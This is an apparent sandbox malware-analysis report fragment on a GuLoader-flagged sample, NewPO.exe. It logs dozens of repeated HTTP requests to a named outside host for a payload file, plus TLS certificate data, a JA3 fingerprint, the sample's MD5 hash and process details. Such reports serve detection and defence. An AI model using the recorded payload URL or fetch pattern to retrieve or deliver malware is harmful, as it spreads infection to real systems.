        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:47.401124954 CEST10556INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:46 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:48.364590883 CEST10634OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:49.349910021 CEST10635INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:48 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:50.724378109 CEST10711OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:51.530771017 CEST10711INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:50 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:52.459871054 CEST10788OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:53.038024902 CEST10789INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:52 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:54.005870104 CEST10865OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:54.561620951 CEST10866INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:54 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:55.427839041 CEST10943OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:56.000973940 CEST10944INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:55 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:56.928607941 CEST11020OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:57.477998972 CEST11020INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:56 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:58.381475925 CEST11096OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:03:58.961355925 CEST11097INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:58 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:03:59.865921974 CEST11172OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:00.394136906 CEST11173INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:03:59 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:01.302901030 CEST11250OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:01.979273081 CEST11251INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:01 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:02.912579060 CEST11327OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:03.510622025 CEST11328INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:02 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:04.444035053 CEST11404OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:05.006553888 CEST11405INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:04 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:05.897327900 CEST11482OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:06.440732956 CEST11482INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:05 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:07.382128954 CEST11559OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:07.937366009 CEST11560INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:07 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:08.913392067 CEST11636OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:09.493913889 CEST11636INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:08 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:10.426561117 CEST11713OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:10.963356972 CEST11714INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:10 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:11.883366108 CEST11790OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:12.529957056 CEST11790INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:11 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:13.570173025 CEST11868OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:14.347250938 CEST11868INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:13 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:15.257961035 CEST11945OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:15.850013971 CEST11945INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:15 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:16.727026939 CEST12022OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:17.305912018 CEST12022INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:16 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:18.211570024 CEST12099OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:18.729069948 CEST12099INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:18 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:19.617588997 CEST12177OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:20.182004929 CEST12177INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:19 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:21.211858988 CEST12254OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:21.803276062 CEST12255INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:21 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:23.086756945 CEST12332OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:23.860538006 CEST12332INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:23 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:24.758266926 CEST12408OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:25.407870054 CEST12409INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:24 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:26.399306059 CEST12486OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:27.110202074 CEST12486INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:26 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:28.042656898 CEST12564OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:28.620795012 CEST12564INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:28 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:29.509931087 CEST12641OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:30.082252026 CEST12641INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:29 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:31.025298119 CEST12718OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:31.687664986 CEST12718INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:31 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:32.634655952 CEST12794OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:33.165378094 CEST12795INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:32 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:34.087359905 CEST12872OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:34.638097048 CEST12872INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:34 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:35.619318008 CEST12948OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:36.186898947 CEST12948INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:35 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:37.072175980 CEST13026OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:37.682966948 CEST13026INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:37 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:38.759776115 CEST13102OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:39.308701992 CEST13102INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:38 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:40.337769985 CEST13179OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:40.887051105 CEST13180INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:40 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:41.901184082 CEST13256OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:42.517865896 CEST13257INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:41 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:43.463874102 CEST13333OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:44.063239098 CEST13334INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:43 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8
        May 11, 2021 14:04:45.135086060 CEST13410OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
        Cache-Control: no-cache
        May 11, 2021 14:04:45.714656115 CEST13411INHTTP/1.1 301 Moved Permanently
        Date: Tue, 11 May 2021 12:04:45 GMT
        Server: Apache
        Expires: Wed, 11 Jan 1984 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate, max-age=0
        X-Redirect-By: WordPress
        Location: https://avicennamch.com/osita/bin_ygJfz82.bin
        Content-Length: 0
        Content-Type: text/html; charset=UTF-8


        HTTPS Packets

        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
        May 11, 2021 14:02:39.731117010 CEST136.243.220.59443192.168.2.449765CN=*.avicennamch.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat May 08 15:22:11 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Fri Aug 06 15:22:11 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
        CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
        CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024

        Code Manipulations

        Statistics

        Behavior

        Click to jump to process

        System Behavior

        General

        Start time:14:00:42
        Start date:11/05/2021
        Path:C:\Users\user\Desktop\NewPO.exe
        Wow64 process (32bit):true
        Commandline:'C:\Users\user\Desktop\NewPO.exe'
        Imagebase:0x400000
        File size:110592 bytes
        MD5 hash:D4F1E0CED899708FDD34FAAB5F154FF3
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:Visual Basic
        Yara matches:
        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.842923779.0000000000460000.00000040.00000001.sdmp, Author: Joe Security
        Reputation:low

        General

        Start time:14:02:15
        Start date:11/05/2021
        Path:C:\Users\user\Desktop\NewPO.exe
        Wow64 process (32bit):true
        Commandline:'C:\Users\user\Desktop\NewPO.exe'
        Imagebase:0x400000
        File size:110592 bytes
        MD5 hash:D4F1E0CED899708FDD34FAAB5F154FF3
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low

        Disassembly

        Code Analysis

        Reset < >